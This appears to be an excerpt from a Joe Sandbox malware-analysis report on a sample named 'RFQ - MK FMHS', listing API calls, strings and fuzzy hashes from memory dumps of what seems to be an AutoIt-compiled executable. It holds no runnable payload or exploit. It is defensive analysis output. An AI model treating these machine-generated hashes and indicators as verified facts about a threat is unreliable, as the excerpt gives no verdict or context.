                    • Instruction Fuzzy Hash: 47A0113000020CAB8A002B82EC088A8BFAEEB802A0B008020F80C80022AB32A8208A80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
                    • Instruction ID: 1f9c3f10f852df1f88d0ed1adfc12f82930bdeefd2846c1a424a7026e4cd9cfc
                    • Opcode Fuzzy Hash: 124fb7860383ab9eec92f87f9f6703f2ab43a9454e3fcb34ad8898827005389c
                    • Instruction Fuzzy Hash: 5B224B31501615CBCF38AB14C684BBDB7A1EB41308FA8646EDC4EBB195DB35ADC2CB61
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: cdf395f0c1bb5cc714151f374cff440326fa30ad45b97363a6244af8b6158689
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 45C1C5322051930ADF2D8639D43407EFBE15EA27B531A279EE4B3EB5C5EF20D524E620
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: c2d1b590c332fab5f15ebc501592d3e6ae7e0c71fc16d94daca16b6f8737eba6
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: F4C182332051930ADF6D463AD43413EBBE15FA27B531A27ADE4B2EB5D4EF20D524E620
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 5a759a86e6c4a3628fca9058091bb28e7fdeac0a9a4de2790891e426344af8ca
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 3FC1833630919309DF2D463A943407EFAE15EA27B531A27EDE4B3EB5D4EF20D524D610
                    APIs
                    • CharUpperBuffW.USER32(?,?,00EFF910), ref: 00EF38AF
                    • IsWindowVisible.USER32(?), ref: 00EF38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
                    • Instruction ID: 638ca269279c19235862ab94c55b953870d75bffe19faef8f61d628f382ef0c0
                    • Opcode Fuzzy Hash: c36958b4434fcaa09ec3676a92ce867188b62a5dba3277185b5af4da570698f6
                    • Instruction Fuzzy Hash: B9D17F302043099FCB14EF24C551ABAB7E1AF94354F11A45CB9867B3A3CB31EE4ACB91
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00EFA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 00EFA8D0
                    • GetSysColor.USER32(0000000F), ref: 00EFA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 00EFA8F6
                    • SelectObject.GDI32(?,?), ref: 00EFA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFA930
                    • GetSysColor.USER32(00000010), ref: 00EFA938
                    • CreateSolidBrush.GDI32(00000000), ref: 00EFA93F
                    • FrameRect.USER32(?,?,00000000), ref: 00EFA94E
                    • DeleteObject.GDI32(00000000), ref: 00EFA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00EFA9A0
                    • FillRect.USER32(?,?,?), ref: 00EFA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EFA9FD
                      • Part of subcall function 00EFAB60: GetSysColor.USER32(00000012), ref: 00EFAB99
                      • Part of subcall function 00EFAB60: SetTextColor.GDI32(?,?), ref: 00EFAB9D
                      • Part of subcall function 00EFAB60: GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
                      • Part of subcall function 00EFAB60: GetSysColor.USER32(0000000F), ref: 00EFABBE
                      • Part of subcall function 00EFAB60: GetSysColor.USER32(00000011), ref: 00EFABDB
                      • Part of subcall function 00EFAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
                      • Part of subcall function 00EFAB60: SelectObject.GDI32(?,00000000), ref: 00EFABFA
                      • Part of subcall function 00EFAB60: SetBkColor.GDI32(?,00000000), ref: 00EFAC03
                      • Part of subcall function 00EFAB60: SelectObject.GDI32(?,?), ref: 00EFAC10
                      • Part of subcall function 00EFAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
                      • Part of subcall function 00EFAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
                      • Part of subcall function 00EFAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 23c06a5be5fd44a9bf95fd20b1db24a761322c1ad1859a14f17dac64ff373c13
                    • Instruction ID: 3a1106b629c837409487dfb53a1e7c769e8206ff4a5500ac41f83faf99fd8574
                    • Opcode Fuzzy Hash: 23c06a5be5fd44a9bf95fd20b1db24a761322c1ad1859a14f17dac64ff373c13
                    • Instruction Fuzzy Hash: 1FA1B1B1008305BFD7109F65DC08E7B7BA9FF88321F145A39FA66AA1A1C771D948CB52
                    APIs
                    • DestroyWindow.USER32(?,?,?), ref: 00E72CA2
                    • DeleteObject.GDI32(00000000), ref: 00E72CE8
                    • DeleteObject.GDI32(00000000), ref: 00E72CF3
                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00E72CFE
                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00E72D09
                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EAC68B
                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EAC6C4
                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EACAED
                      • Part of subcall function 00E71B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E72036,?,00000000,?,?,?,?,00E716CB,00000000,?), ref: 00E71B9A
                    • SendMessageW.USER32(?,00001053), ref: 00EACB2A
                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EACB41
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB57
                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00EACB62
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                    • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                    • String ID: 0
                    • API String ID: 464785882-4108050209
                    • Opcode ID: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
                    • Instruction ID: 620ec5bb11378ba942a3253c1e57b55f6bd382280c1a5c4df46c9b7f9cf57b0e
                    • Opcode Fuzzy Hash: 13ebec404dec64f8754eec1ad3f49acc34face23d2721d20b6f9e6edbc771cc5
                    • Instruction Fuzzy Hash: 58128E30604201AFDB15CF24C884BA9B7E5BF5A304F64A569F599EF262CB31FC45CB91
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00EE77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00EE78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00EE78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00EE7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00EE7946
                    • GetClientRect.USER32(00000000,?), ref: 00EE7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00EE7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00EE79A5
                    • GetStockObject.GDI32(00000011), ref: 00EE79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 00EE79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00EE79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EE79D2
                    • DeleteDC.GDI32(00000000), ref: 00EE79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00EE7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EE7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00EE7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EE7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EE7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00EE7AAE
                    • GetStockObject.GDI32(00000011), ref: 00EE7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EE7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00EE7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
                    • Instruction ID: 11188ea79987b3c9c9a048a3d9f32d6325611d48c9dcde3c899a4c7671fd876c
                    • Opcode Fuzzy Hash: c8c225c74f6de7e9d673556e62a53c50ff7d1a0d3abf94e709a99ebcde22e81b
                    • Instruction Fuzzy Hash: DEA15E71A40219BFEB149BA5DC4AFABBBA9EF44714F018114FA15F72E1CB70AD00CB64
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00EDAF89
                    • GetDriveTypeW.KERNEL32(?,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB066
                    • SetErrorMode.KERNEL32(00000000,00EFFAC0,?,\\.\,00EFF910), ref: 00EDB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
                    • Instruction ID: 65a78e193a0ee5258c96033ad28b8c2ceec99dda9b43869f9894141a9691071e
                    • Opcode Fuzzy Hash: 3cb6ea0ff5fdd1988078eea63d38b3f5b312325f7476ee487d7d7c9fc84532af
                    • Instruction Fuzzy Hash: 82519C30681305EB8B04DB10D9A29BD73B1EF54745B22A027E41AB7391E775DD43EB47
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 6a61c3aed55eba3de6ae97f5a24414a8f1ea8fbf9b894335966114f4d973c12b
                    • Instruction ID: c7fd92bc4d8ac36823d0af26b9473712d7ef930e4998d25e30f5cb65a04d9c33
                    • Opcode Fuzzy Hash: 6a61c3aed55eba3de6ae97f5a24414a8f1ea8fbf9b894335966114f4d973c12b
                    • Instruction Fuzzy Hash: 50812B71600705BBCF21AF70CC82FAE77D8AF16708F04A025FD49BA1C6EB61EA55D261
                    APIs
                    • GetSysColor.USER32(00000012), ref: 00EFAB99
                    • SetTextColor.GDI32(?,?), ref: 00EFAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 00EFABB3
                    • GetSysColor.USER32(0000000F), ref: 00EFABBE
                    • CreateSolidBrush.GDI32(?), ref: 00EFABC3
                    • GetSysColor.USER32(00000011), ref: 00EFABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EFABE9
                    • SelectObject.GDI32(?,00000000), ref: 00EFABFA
                    • SetBkColor.GDI32(?,00000000), ref: 00EFAC03
                    • SelectObject.GDI32(?,?), ref: 00EFAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00EFAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EFAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00EFAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EFACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EFACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00EFACEC
                    • DrawFocusRect.USER32(?,?), ref: 00EFACF7
                    • GetSysColor.USER32(00000011), ref: 00EFAD05
                    • SetTextColor.GDI32(?,00000000), ref: 00EFAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EFAD21
                    • SelectObject.GDI32(?,00EFA869), ref: 00EFAD38
                    • DeleteObject.GDI32(?), ref: 00EFAD43
                    • SelectObject.GDI32(?,?), ref: 00EFAD49
                    • DeleteObject.GDI32(?), ref: 00EFAD4E
                    • SetTextColor.GDI32(?,?), ref: 00EFAD54
                    • SetBkColor.GDI32(?,?), ref: 00EFAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 205a858a4d932cc4d9b89a0503ba7221c867ed707eab564916b1344e128ccbc1
                    • Instruction ID: daf9e7b45ee292a82ba342a2daffc1cdd2a262fc7e16d8ef3b5c99373a402248
                    • Opcode Fuzzy Hash: 205a858a4d932cc4d9b89a0503ba7221c867ed707eab564916b1344e128ccbc1
                    • Instruction Fuzzy Hash: FC616EB1901218EFDF119FA5DC48EBEBB79EF48320F148125FA15BB2A1D6719D40DB90
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EF8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8D45
                    • CharNextW.USER32(0000014E), ref: 00EF8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EF8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EF8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EF8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 00EF8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EF8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF8E8C
                    • _memset.LIBCMT ref: 00EF8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EF8EFA
                    • _memset.LIBCMT ref: 00EF8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00EF8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EF8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00EF9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EF90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF9121
                    • DrawMenuBar.USER32(?), ref: 00EF9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 00EF9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: 803425c68880f4f47d5fded9432d8a889f318ba720fe44cc27e80ee4681c49d5
                    • Instruction ID: 9676690ef859ff45c91d83c71706d0cb78c2f5396f17de96a927db989e492d2b
                    • Opcode Fuzzy Hash: 803425c68880f4f47d5fded9432d8a889f318ba720fe44cc27e80ee4681c49d5
                    • Instruction Fuzzy Hash: A7E19D7090120DAEDF209F61CC88AFE7BB9EF05714F109169FA55BA291DB308A85DF61
                    APIs
                    • GetCursorPos.USER32(?), ref: 00EF4C51
                    • GetDesktopWindow.USER32 ref: 00EF4C66
                    • GetWindowRect.USER32(00000000), ref: 00EF4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 00EF4CCF
                    • DestroyWindow.USER32(?), ref: 00EF4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EF4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EF4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EF4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 00EF4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EF4D90
                    • IsWindowVisible.USER32(?), ref: 00EF4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EF4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EF4DDF
                    • GetWindowRect.USER32(?,?), ref: 00EF4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00EF4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 00EF4E37
                    • CopyRect.USER32(?,?), ref: 00EF4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 00EF4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1639837122.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                     • Associated: 00000000.00000002.1639821332.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000EFF000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639875394.0000000000F25000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639907468.0000000000F2F000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 00000000.00000002.1639920421.0000000000F38000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e70000_RFQ - MK FMHS.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
                    • Instruction ID: d9171acf5ac6430cb090adca834e38910d727419ecc10c1ef21943dedf05ca75
                    • Opcode Fuzzy Hash: 6d221cffd18bae13fb9488f8d5c48890f1f502a1329783c79a7bc84febae8884
                    • Instruction Fuzzy Hash: 69B148B1604341AFDB04DF65C844B6BBBE4FF88314F009918F699AB2A2DB71EC04CB91
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728BC
                    • GetSystemMetrics.USER32(00000007), ref: 00E728C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E728EF
                    • GetSystemMetrics.USER32(00000008), ref: 00E728F7
                    • GetSystemMetrics.USER32(00000004), ref: 00E7291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E72939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E72949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E7297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E72990
                    • GetClientRect.USER32(00000000,000000FF), ref: 00E729AE
